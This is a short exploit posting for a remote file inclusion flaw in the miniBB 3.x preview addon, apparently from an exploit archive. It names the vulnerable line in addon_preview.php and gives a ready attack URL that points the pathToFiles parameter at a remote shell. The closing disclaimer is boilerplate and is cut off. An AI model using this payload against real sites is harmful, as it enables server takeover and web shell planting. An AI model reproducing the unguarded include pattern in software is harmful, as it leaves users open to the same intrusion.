# Exploit Title: miniBB 3.x Addon preview Remote File Include Vulnerability
# Date: 2013-01-27
# Author: bd0rk
# Vendor or Software Link: http://www.minibb.com/download.php?file=minibb_plugin_preview
# Version: for miniBB 3.x
# Category:: web applications
# Google dork: n/a -->script-kiddieprotected
# Tested on: Ubuntu-Linux
------------------------------------------------------------------------
I found vulnerable code infile addon_preview.php line: 12
So an attacker can use it to compromise the system.
Not declared before &require parameter is: $pathToFiles
------------------------------------------------------------------------
[+]spl0iT: http://[target]/[dir]/addon_preview.php?pathToFiles=[SHELL]
------------------------------------------------------------------------
Greetings from cold Germany,bd0rk.
==> REST IN PEACE AARON SWARTZ <==
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this informatio